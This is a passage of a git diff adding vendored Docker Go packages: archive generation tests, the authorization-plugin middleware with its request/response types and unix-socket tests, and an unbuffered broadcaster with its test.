input[i+1] + } + output = append(output, pair) + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go new file mode 100644 index 0000000000..46ab36697a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go @@ -0,0 +1,98 @@ +package archive + +import ( + "archive/tar" + "bytes" + "io" + "testing" +) + +func TestGenerateEmptyFile(t *testing.T) { + archive, err := Generate("emptyFile") + if err != nil { + t.Fatal(err) + } + if archive == nil { + t.Fatal("The generated archive should not be nil.") + } + + expectedFiles := [][]string{ + {"emptyFile", ""}, + } + + tr := tar.NewReader(archive) + actualFiles := make([][]string, 0, 10) + i := 0 + for { + hdr, err := tr.Next() + if err == io.EOF { + break + } + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(tr) + content := buf.String() + actualFiles = append(actualFiles, []string{hdr.Name, content}) + i++ + } + if len(actualFiles) != len(expectedFiles) { + t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles)) + } + for i := 0; i < len(expectedFiles); i++ { + actual := actualFiles[i] + expected := expectedFiles[i] + if actual[0] != expected[0] { + t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], actual[0]) + } + if actual[1] != expected[1] { + t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1]) + } + } +} + +func TestGenerateWithContent(t *testing.T) { + archive, err := Generate("file", "content") + if err != nil { + t.Fatal(err) + } + if archive == nil { + t.Fatal("The generated archive should not be nil.") + } + + expectedFiles := [][]string{ + {"file", "content"}, + } + + tr := tar.NewReader(archive) + actualFiles := make([][]string, 0, 10) + i := 0 + for { + hdr, err := tr.Next() + if err == io.EOF { + break + } + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(tr) + content := buf.String() + actualFiles = append(actualFiles, []string{hdr.Name, content}) + i++ + } + if len(actualFiles) != len(expectedFiles) { + t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles)) + } + for i := 0; i < len(expectedFiles); i++ { + actual := actualFiles[i] + expected := expectedFiles[i] + if actual[0] != expected[0] { + t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], actual[0]) + } + if actual[1] != expected[1] { + t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1]) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go new file mode 100644 index 0000000000..05c75f1a67 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/api.go @@ -0,0 +1,88 @@ +package authorization + +import ( + "crypto/x509" + "encoding/json" + "encoding/pem" +) + +const ( + // AuthZApiRequest is the url for daemon request authorization + AuthZApiRequest = "AuthZPlugin.AuthZReq" + + // AuthZApiResponse is the url for daemon response authorization + AuthZApiResponse = "AuthZPlugin.AuthZRes" + + // AuthZApiImplements is the name of the interface all AuthZ plugins implement + AuthZApiImplements = "authz" +) + +// PeerCertificate is a wrapper around x509.Certificate which provides a sane +// enconding/decoding to/from PEM format and JSON. +type PeerCertificate x509.Certificate + +// MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate. +func (pc *PeerCertificate) MarshalJSON() ([]byte, error) { + b := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: pc.Raw}) + return json.Marshal(b) +} + +// UnmarshalJSON populates a new PeerCertificate struct from JSON data. +func (pc *PeerCertificate) UnmarshalJSON(b []byte) error { + var buf []byte + if err := json.Unmarshal(b, &buf); err != nil { + return err + } + derBytes, _ := pem.Decode(buf) + c, err := x509.ParseCertificate(derBytes.Bytes) + if err != nil { + return err + } + *pc = PeerCertificate(*c) + return nil +} + +// Request holds data required for authZ plugins +type Request struct { + // User holds the user extracted by AuthN mechanism + User string `json:"User,omitempty"` + + // UserAuthNMethod holds the mechanism used to extract user details (e.g., krb) + UserAuthNMethod string `json:"UserAuthNMethod,omitempty"` + + // RequestMethod holds the HTTP method (GET/POST/PUT) + RequestMethod string `json:"RequestMethod,omitempty"` + + // RequestUri holds the full HTTP uri (e.g., /v1.21/version) + RequestURI string `json:"RequestUri,omitempty"` + + // RequestBody stores the raw request body sent to the docker daemon + RequestBody []byte `json:"RequestBody,omitempty"` + + // RequestHeaders stores the raw request headers sent to the docker daemon + RequestHeaders map[string]string `json:"RequestHeaders,omitempty"` + + // RequestPeerCertificates stores the request's TLS peer certificates in PEM format + RequestPeerCertificates []*PeerCertificate `json:"RequestPeerCertificates,omitempty"` + + // ResponseStatusCode stores the status code returned from docker daemon + ResponseStatusCode int `json:"ResponseStatusCode,omitempty"` + + // ResponseBody stores the raw response body sent from docker daemon + ResponseBody []byte `json:"ResponseBody,omitempty"` + + // ResponseHeaders stores the response headers sent to the docker daemon + ResponseHeaders map[string]string `json:"ResponseHeaders,omitempty"` +} + +// Response represents authZ plugin response +type Response struct { + // Allow indicating whether the user is allowed or not + Allow bool `json:"Allow"` + + // Msg stores the authorization message + Msg string `json:"Msg,omitempty"` + + // Err stores a message in case there's an error + Err string `json:"Err,omitempty"` +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go new file mode 100644 index 0000000000..dc9a9ae56f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go @@ -0,0 +1,186 @@ +package authorization + +import ( + "bufio" + "bytes" + "fmt" + "io" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/ioutils" +) + +const maxBodySize = 1048576 // 1MB + +// NewCtx creates new authZ context, it is used to store authorization information related to a specific docker +// REST http session +// A context provides two method: +// Authenticate Request: +// Call authZ plugins with current REST request and AuthN response +// Request contains full HTTP packet sent to the docker daemon +// https://docs.docker.com/engine/reference/api/ +// +// Authenticate Response: +// Call authZ plugins with full info about current REST request, REST response and AuthN response +// The response from this method may contains content that overrides the daemon response +// This allows authZ plugins to filter privileged content +// +// If multiple authZ plugins are specified, the block/allow decision is based on ANDing all plugin results +// For response manipulation, the response from each plugin is piped between plugins. Plugin execution order +// is determined according to daemon parameters +func NewCtx(authZPlugins []Plugin, user, userAuthNMethod, requestMethod, requestURI string) *Ctx { + return &Ctx{ + plugins: authZPlugins, + user: user, + userAuthNMethod: userAuthNMethod, + requestMethod: requestMethod, + requestURI: requestURI, + } +} + +// Ctx stores a single request-response interaction context +type Ctx struct { + user string + userAuthNMethod string + requestMethod string + requestURI string + plugins []Plugin + // authReq stores the cached request object for the current transaction + authReq *Request +} + +// AuthZRequest authorized the request to the docker daemon using authZ plugins +func (ctx *Ctx) AuthZRequest(w http.ResponseWriter, r *http.Request) error { + var body []byte + if sendBody(ctx.requestURI, r.Header) && r.ContentLength > 0 && r.ContentLength < maxBodySize { + var err error + body, r.Body, err = drainBody(r.Body) + if err != nil { + return err + } + } + + var h bytes.Buffer + if err := r.Header.Write(&h); err != nil { + return err + } + + ctx.authReq = &Request{ + User: ctx.user, + UserAuthNMethod: ctx.userAuthNMethod, + RequestMethod: ctx.requestMethod, + RequestURI: ctx.requestURI, + RequestBody: body, + RequestHeaders: headers(r.Header), + } + + if r.TLS != nil { + for _, c := range r.TLS.PeerCertificates { + pc := PeerCertificate(*c) + ctx.authReq.RequestPeerCertificates = append(ctx.authReq.RequestPeerCertificates, &pc) + } + } + + for _, plugin := range ctx.plugins { + logrus.Debugf("AuthZ request using plugin %s", plugin.Name()) + + authRes, err := plugin.AuthZRequest(ctx.authReq) + if err != nil { + return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err) + } + + if !authRes.Allow { + return newAuthorizationError(plugin.Name(), authRes.Msg) + } + } + + return nil +} + +// AuthZResponse authorized and manipulates the response from docker daemon using authZ plugins +func (ctx *Ctx) AuthZResponse(rm ResponseModifier, r *http.Request) error { + ctx.authReq.ResponseStatusCode = rm.StatusCode() + ctx.authReq.ResponseHeaders = headers(rm.Header()) + + if sendBody(ctx.requestURI, rm.Header()) { + ctx.authReq.ResponseBody = rm.RawBody() + } + + for _, plugin := range ctx.plugins { + logrus.Debugf("AuthZ response using plugin %s", plugin.Name()) + + authRes, err := plugin.AuthZResponse(ctx.authReq) + if err != nil { + return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err) + } + + if !authRes.Allow { + return newAuthorizationError(plugin.Name(), authRes.Msg) + } + } + + rm.FlushAll() + + return nil +} + +// drainBody dump the body (if its length is less than 1MB) without modifying the request state +func drainBody(body io.ReadCloser) ([]byte, io.ReadCloser, error) { + bufReader := bufio.NewReaderSize(body, maxBodySize) + newBody := ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() }) + + data, err := bufReader.Peek(maxBodySize) + // Body size exceeds max body size + if err == nil { + logrus.Warnf("Request body is larger than: '%d' skipping body", maxBodySize) + return nil, newBody, nil + } + // Body size is less than maximum size + if err == io.EOF { + return data, newBody, nil + } + // Unknown error + return nil, newBody, err +} + +// sendBody returns true when request/response body should be sent to AuthZPlugin +func sendBody(url string, header http.Header) bool { + // Skip body for auth endpoint + if strings.HasSuffix(url, "/auth") { + return false + } + + // body is sent only for text or json messages + return header.Get("Content-Type") == "application/json" +} + +// headers returns flatten version of the http headers excluding authorization +func headers(header http.Header) map[string]string { + v := make(map[string]string, 0) + for k, values := range header { + // Skip authorization headers + if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") { + continue + } + for _, val := range values { + v[k] = val + } + } + return v +} + +// authorizationError represents an authorization deny error +type authorizationError struct { + error +} + +// HTTPErrorStatusCode returns the authorization error status code (forbidden) +func (e authorizationError) HTTPErrorStatusCode() int { + return http.StatusForbidden +} + +func newAuthorizationError(plugin, msg string) authorizationError { + return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)} +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go new file mode 100644 index 0000000000..a787f3cd8c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go @@ -0,0 +1,282 @@ +// +build !windows + +// TODO Windows: This uses a Unix socket for testing. This might be possible +// to port to Windows using a named pipe instead. + +package authorization + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "os" + "path" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-connections/tlsconfig" + "github.com/gorilla/mux" +) + +const ( + pluginAddress = "authz-test-plugin.sock" +) + +func TestAuthZRequestPluginError(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestBody: []byte("sample body"), + RequestURI: "www.authz.com/auth", + RequestMethod: "GET", + RequestHeaders: map[string]string{"header": "value"}, + } + server.replayResponse = Response{ + Err: "an error", + } + + actualResponse, err := authZPlugin.AuthZRequest(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + } + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestAuthZRequestPlugin(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestBody: []byte("sample body"), + RequestURI: "www.authz.com/auth", + RequestMethod: "GET", + RequestHeaders: map[string]string{"header": "value"}, + } + server.replayResponse = Response{ + Allow: true, + Msg: "Sample message", + } + + actualResponse, err := authZPlugin.AuthZRequest(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + } + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestAuthZResponsePlugin(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestURI: "someting.com/auth", + RequestBody: []byte("sample body"), + } + server.replayResponse = Response{ + Allow: true, + Msg: "Sample message", + } + + actualResponse, err := authZPlugin.AuthZResponse(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + } + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestResponseModifier(t *testing.T) { + r := httptest.NewRecorder() + m := NewResponseModifier(r) + m.Header().Set("h1", "v1") + m.Write([]byte("body")) + m.WriteHeader(http.StatusInternalServerError) + + m.FlushAll() + if r.Header().Get("h1") != "v1" { + t.Fatalf("Header value must exists %s", r.Header().Get("h1")) + } + if !reflect.DeepEqual(r.Body.Bytes(), []byte("body")) { + t.Fatalf("Body value must exists %s", r.Body.Bytes()) + } + if r.Code != http.StatusInternalServerError { + t.Fatalf("Status code must be correct %d", r.Code) + } +} + +func TestDrainBody(t *testing.T) { + tests := []struct { + length int // length is the message length send to drainBody + expectedBodyLength int // expectedBodyLength is the expected body length after drainBody is called + }{ + {10, 10}, // Small message size + {maxBodySize - 1, maxBodySize - 1}, // Max message size + {maxBodySize * 2, 0}, // Large message size (skip copying body) + + } + + for _, test := range tests { + msg := strings.Repeat("a", test.length) + body, closer, err := drainBody(ioutil.NopCloser(bytes.NewReader([]byte(msg)))) + if err != nil { + t.Fatal(err) + } + if len(body) != test.expectedBodyLength { + t.Fatalf("Body must be copied, actual length: '%d'", len(body)) + } + if closer == nil { + t.Fatal("Closer must not be nil") + } + modified, err := ioutil.ReadAll(closer) + if err != nil { + t.Fatalf("Error must not be nil: '%v'", err) + } + if len(modified) != len(msg) { + t.Fatalf("Result should not be truncated. Original length: '%d', new length: '%d'", len(msg), len(modified)) + } + } +} + +func TestResponseModifierOverride(t *testing.T) { + r := httptest.NewRecorder() + m := NewResponseModifier(r) + m.Header().Set("h1", "v1") + m.Write([]byte("body")) + m.WriteHeader(http.StatusInternalServerError) + + overrideHeader := make(http.Header) + overrideHeader.Add("h1", "v2") + overrideHeaderBytes, err := json.Marshal(overrideHeader) + if err != nil { + t.Fatalf("override header failed %v", err) + } + + m.OverrideHeader(overrideHeaderBytes) + m.OverrideBody([]byte("override body")) + m.OverrideStatusCode(http.StatusNotFound) + m.FlushAll() + if r.Header().Get("h1") != "v2" { + t.Fatalf("Header value must exists %s", r.Header().Get("h1")) + } + if !reflect.DeepEqual(r.Body.Bytes(), []byte("override body")) { + t.Fatalf("Body value must exists %s", r.Body.Bytes()) + } + if r.Code != http.StatusNotFound { + t.Fatalf("Status code must be correct %d", r.Code) + } +} + +// createTestPlugin creates a new sample authorization plugin +func createTestPlugin(t *testing.T) *authorizationPlugin { + pwd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + + client, err := plugins.NewClient("unix:///"+path.Join(pwd, pluginAddress), &tlsconfig.Options{InsecureSkipVerify: true}) + if err != nil { + t.Fatalf("Failed to create client %v", err) + } + + return &authorizationPlugin{name: "plugin", plugin: client} +} + +// AuthZPluginTestServer is a simple server that implements the authZ plugin interface +type authZPluginTestServer struct { + listener net.Listener + t *testing.T + // request stores the request sent from the daemon to the plugin + recordedRequest Request + // response stores the response sent from the plugin to the daemon + replayResponse Response + server *httptest.Server +} + +// start starts the test server that implements the plugin +func (t *authZPluginTestServer) start() { + r := mux.NewRouter() + l, err := net.Listen("unix", pluginAddress) + if err != nil { + t.t.Fatal(err) + } + t.listener = l + r.HandleFunc("/Plugin.Activate", t.activate) + r.HandleFunc("/"+AuthZApiRequest, t.auth) + r.HandleFunc("/"+AuthZApiResponse, t.auth) + t.server = &httptest.Server{ + Listener: l, + Config: &http.Server{ + Handler: r, + Addr: pluginAddress, + }, + } + t.server.Start() +} + +// stop stops the test server that implements the plugin +func (t *authZPluginTestServer) stop() { + t.server.Close() + os.Remove(pluginAddress) + if t.listener != nil { + t.listener.Close() + } +} + +// auth is a used to record/replay the authentication api messages +func (t *authZPluginTestServer) auth(w http.ResponseWriter, r *http.Request) { + t.recordedRequest = Request{} + body, err := ioutil.ReadAll(r.Body) + if err != nil { + t.t.Fatal(err) + } + r.Body.Close() + json.Unmarshal(body, &t.recordedRequest) + b, err := json.Marshal(t.replayResponse) + if err != nil { + t.t.Fatal(err) + } + w.Write(b) +} + +func (t *authZPluginTestServer) activate(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{AuthZApiImplements}}) + if err != nil { + t.t.Fatal(err) + } + w.Write(b) +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go new file mode 100644 index 0000000000..52890dd360 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go @@ -0,0 +1,84 @@ +package authorization + +import ( + "net/http" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugingetter" + "golang.org/x/net/context" +) + +// Middleware uses a list of plugins to +// handle authorization in the API requests. +type Middleware struct { + mu sync.Mutex + plugins []Plugin +} + +// NewMiddleware creates a new Middleware +// with a slice of plugins names. +func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware { + SetPluginGetter(pg) + return &Middleware{ + plugins: newPlugins(names), + } +} + +// SetPlugins sets the plugin used for authorization +func (m *Middleware) SetPlugins(names []string) { + m.mu.Lock() + m.plugins = newPlugins(names) + m.mu.Unlock() +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + + m.mu.Lock() + plugins := m.plugins + m.mu.Unlock() + if len(plugins) == 0 { + return handler(ctx, w, r, vars) + } + + user := "" + userAuthNMethod := "" + + // Default authorization using existing TLS connection credentials + // FIXME: Non trivial authorization mechanisms (such as advanced certificate validations, kerberos support + // and ldap) will be extracted using AuthN feature, which is tracked under: + // https://github.com/docker/docker/pull/20883 + if r.TLS != nil && len(r.TLS.PeerCertificates) > 0 { + user = r.TLS.PeerCertificates[0].Subject.CommonName + userAuthNMethod = "TLS" + } + + authCtx := NewCtx(plugins, user, userAuthNMethod, r.Method, r.RequestURI) + + if err := authCtx.AuthZRequest(w, r); err != nil { + logrus.Errorf("AuthZRequest for %s %s returned error: %s", r.Method, r.RequestURI, err) + return err + } + + rw := NewResponseModifier(w) + + var errD error + + if errD = handler(ctx, rw, r, vars); errD != nil { + logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD) + } + + if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil { + logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err) + return err + } + + if errD != nil { + return errD + } + + return nil + } +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go new file mode 100644 index 0000000000..4b1c71bd4b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go @@ -0,0 +1,112 @@ +package authorization + +import ( + "sync" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" +) + +// Plugin allows third party plugins to authorize requests and responses +// in the context of docker API +type Plugin interface { + // Name returns the registered plugin name + Name() string + + // AuthZRequest authorizes the request from the client to the daemon + AuthZRequest(*Request) (*Response, error) + + // AuthZResponse authorizes the response from the daemon to the client + AuthZResponse(*Request) (*Response, error) +} + +// newPlugins constructs and initializes the authorization plugins based on plugin names +func newPlugins(names []string) []Plugin { + plugins := []Plugin{} + pluginsMap := make(map[string]struct{}) + for _, name := range names { + if _, ok := pluginsMap[name]; ok { + continue + } + pluginsMap[name] = struct{}{} + plugins = append(plugins, newAuthorizationPlugin(name)) + } + return plugins +} + +var getter plugingetter.PluginGetter + +// SetPluginGetter sets the plugingetter +func SetPluginGetter(pg plugingetter.PluginGetter) { + getter = pg +} + +// GetPluginGetter gets the plugingetter +func GetPluginGetter() plugingetter.PluginGetter { + return getter +} + +// authorizationPlugin is an internal adapter to docker plugin system +type authorizationPlugin struct { + plugin *plugins.Client + name string + once sync.Once +} + +func newAuthorizationPlugin(name string) Plugin { + return &authorizationPlugin{name: name} +} + +func (a *authorizationPlugin) Name() string { + return a.name +} + +func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) { + if err := a.initPlugin(); err != nil { + return nil, err + } + + authRes := &Response{} + if err := a.plugin.Call(AuthZApiRequest, authReq, authRes); err != nil { + return nil, err + } + + return authRes, nil +} + +func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error) { + if err := a.initPlugin(); err != nil { + return nil, err + } + + authRes := &Response{} + if err := a.plugin.Call(AuthZApiResponse, authReq, authRes); err != nil { + return nil, err + } + + return authRes, nil +} + +// initPlugin initializes the authorization plugin if needed +func (a *authorizationPlugin) initPlugin() error { + // Lazy loading of plugins + var err error + a.once.Do(func() { + if a.plugin == nil { + var plugin plugingetter.CompatPlugin + var e error + + if pg := GetPluginGetter(); pg != nil { + plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP) + } else { + plugin, e = plugins.Get(a.name, AuthZApiImplements) + } + if e != nil { + err = e + return + } + a.plugin = plugin.Client() + } + }) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go new file mode 100644 index 0000000000..129bf2f417 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/response.go @@ -0,0 +1,203 @@ +package authorization + +import ( + "bufio" + "bytes" + "encoding/json" + "fmt" + "net" + "net/http" + + "github.com/Sirupsen/logrus" +) + +// ResponseModifier allows authorization plugins to read and modify the content of the http.response +type ResponseModifier interface { + http.ResponseWriter + http.Flusher + http.CloseNotifier + + // RawBody returns the current http content + RawBody() []byte + + // RawHeaders returns the current content of the http headers + RawHeaders() ([]byte, error) + + // StatusCode returns the current status code + StatusCode() int + + // OverrideBody replaces the body of the HTTP reply + OverrideBody(b []byte) + + // OverrideHeader replaces the headers of the HTTP reply + OverrideHeader(b []byte) error + + // OverrideStatusCode replaces the status code of the HTTP reply + OverrideStatusCode(statusCode int) + + // FlushAll flushes all data to the HTTP response + FlushAll() error + + // Hijacked indicates the response has been hijacked by the Docker daemon + Hijacked() bool +} + +// NewResponseModifier creates a wrapper to an http.ResponseWriter to allow inspecting and modifying the content +func NewResponseModifier(rw http.ResponseWriter) ResponseModifier { + return &responseModifier{rw: rw, header: make(http.Header)} +} + +// responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore +// the http request/response from docker daemon +type responseModifier struct { + // The original response writer + rw http.ResponseWriter + // body holds the response body + body []byte + // header holds the response header + header http.Header + // statusCode holds the response status code + statusCode int + // hijacked indicates the request has been hijacked + hijacked bool +} + +func (rm *responseModifier) Hijacked() bool { + return rm.hijacked +} + +// WriterHeader stores the http status code +func (rm *responseModifier) WriteHeader(s int) { + + // Use original request if hijacked + if rm.hijacked { + rm.rw.WriteHeader(s) + return + } + + rm.statusCode = s +} + +// Header returns the internal http header +func (rm *responseModifier) Header() http.Header { + + // Use original header if hijacked + if rm.hijacked { + return rm.rw.Header() + } + + return rm.header +} + +// StatusCode returns the http status code +func (rm *responseModifier) StatusCode() int { + return rm.statusCode +} + +// OverrideBody replaces the body of the HTTP response +func (rm *responseModifier) OverrideBody(b []byte) { + rm.body = b +} + +// OverrideStatusCode replaces the status code of the HTTP response +func (rm *responseModifier) OverrideStatusCode(statusCode int) { + rm.statusCode = statusCode +} + +// OverrideHeader replaces the headers of the HTTP response +func (rm *responseModifier) OverrideHeader(b []byte) error { + header := http.Header{} + if err := json.Unmarshal(b, &header); err != nil { + return err + } + rm.header = header + return nil +} + +// Write stores the byte array inside content +func (rm *responseModifier) Write(b []byte) (int, error) { + + if rm.hijacked { + return rm.rw.Write(b) + } + + rm.body = append(rm.body, b...) + return len(b), nil +} + +// Body returns the response body +func (rm *responseModifier) RawBody() []byte { + return rm.body +} + +func (rm *responseModifier) RawHeaders() ([]byte, error) { + var b bytes.Buffer + if err := rm.header.Write(&b); err != nil { + return nil, err + } + return b.Bytes(), nil +} + +// Hijack returns the internal connection of the wrapped http.ResponseWriter +func (rm *responseModifier) Hijack() (net.Conn, *bufio.ReadWriter, error) { + + rm.hijacked = true + rm.FlushAll() + + hijacker, ok := rm.rw.(http.Hijacker) + if !ok { + return nil, nil, fmt.Errorf("Internal response writer doesn't support the Hijacker interface") + } + return hijacker.Hijack() +} + +// CloseNotify uses the internal close notify API of the wrapped http.ResponseWriter +func (rm *responseModifier) CloseNotify() <-chan bool { + closeNotifier, ok := rm.rw.(http.CloseNotifier) + if !ok { + logrus.Error("Internal response writer doesn't support the CloseNotifier interface") + return nil + } + return closeNotifier.CloseNotify() +} + +// Flush uses the internal flush API of the wrapped http.ResponseWriter +func (rm *responseModifier) Flush() { + flusher, ok := rm.rw.(http.Flusher) + if !ok { + logrus.Error("Internal response writer doesn't support the Flusher interface") + return + } + + rm.FlushAll() + flusher.Flush() +} + +// FlushAll flushes all data to the HTTP response +func (rm *responseModifier) FlushAll() error { + // Copy the header + for k, vv := range rm.header { + for _, v := range vv { + rm.rw.Header().Add(k, v) + } + } + + // Copy the status code + // Also WriteHeader needs to be done after all the headers + // have been copied (above). + if rm.statusCode > 0 { + rm.rw.WriteHeader(rm.statusCode) + } + + var err error + if len(rm.body) > 0 { + // Write body + _, err = rm.rw.Write(rm.body) + } + + // Clean previous data + rm.body = nil + rm.statusCode = 0 + rm.header = http.Header{} + return err +} diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go new file mode 100644 index 0000000000..784d65d6fe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go @@ -0,0 +1,49 @@ +package broadcaster + +import ( + "io" + "sync" +) + +// Unbuffered accumulates multiple io.WriteCloser by stream. +type Unbuffered struct { + mu sync.Mutex + writers []io.WriteCloser +} + +// Add adds new io.WriteCloser. +func (w *Unbuffered) Add(writer io.WriteCloser) { + w.mu.Lock() + w.writers = append(w.writers, writer) + w.mu.Unlock() +} + +// Write writes bytes to all writers. Failed writers will be evicted during +// this call. +func (w *Unbuffered) Write(p []byte) (n int, err error) { + w.mu.Lock() + var evict []int + for i, sw := range w.writers { + if n, err := sw.Write(p); err != nil || n != len(p) { + // On error, evict the writer + evict = append(evict, i) + } + } + for n, i := range evict { + w.writers = append(w.writers[:i-n], w.writers[i-n+1:]...) + } + w.mu.Unlock() + return len(p), nil +} + +// Clean closes and removes all writers. Last non-eol-terminated part of data +// will be saved. +func (w *Unbuffered) Clean() error { + w.mu.Lock() + for _, sw := range w.writers { + sw.Close() + } + w.writers = nil + w.mu.Unlock() + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go new file mode 100644 index 0000000000..9f8e72bc0f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go @@ -0,0 +1,162 @@ +package broadcaster + +import ( + "bytes" + "errors" + "strings" + + "testing" +) + +type dummyWriter struct { + buffer bytes.Buffer + failOnWrite bool +} + +func (dw *dummyWriter) Write(p []byte) (n int, err error) { + if dw.failOnWrite { + return 0, errors.New("Fake fail") + } + return dw.buffer.Write(p) +} + +func (dw *dummyWriter) String() string { + return dw.buffer.String() +} + +func (dw *dummyWriter) Close() error { + return nil +} + +func TestUnbuffered(t *testing.T) { + writer := new(Unbuffered) + + // Test 1: Both bufferA and bufferB should contain "foo" + bufferA := &dummyWriter{} + writer.Add(bufferA) + bufferB := &dummyWriter{} + writer.Add(bufferB) + writer.Write([]byte("foo")) + + if bufferA.String() != "foo" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + + if bufferB.String() != "foo" { + t.Errorf("Buffer contains %v", bufferB.String()) + } + + // Test2: bufferA and bufferB should contain "foobar", + // while bufferC should only contain "bar" + bufferC := &dummyWriter{} + writer.Add(bufferC) + writer.Write([]byte("bar")) + + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + + if bufferB.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferB.String()) + } + + if bufferC.String() != "bar" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + + // Test3: Test eviction on failure + bufferA.failOnWrite = true + writer.Write([]byte("fail")) + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + if bufferC.String() != "barfail" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + // Even though we reset the flag, no more writes should go in there + bufferA.failOnWrite = false + writer.Write([]byte("test")) + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + if bufferC.String() != "barfailtest" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + + // Test4: Test eviction on multiple simultaneous failures + bufferB.failOnWrite = true + bufferC.failOnWrite = true + bufferD := &dummyWriter{} + writer.Add(bufferD) + writer.Write([]byte("yo")) + writer.Write([]byte("ink")) + if strings.Contains(bufferB.String(), "yoink") { + t.Errorf("bufferB received write. contents: %q", bufferB) + } + if strings.Contains(bufferC.String(), "yoink") { + t.Errorf("bufferC received write. contents: %q", bufferC) + } + if g, w := bufferD.String(), "yoink"; g != w { + t.Errorf("bufferD = %q, want %q", g, w) + } + + 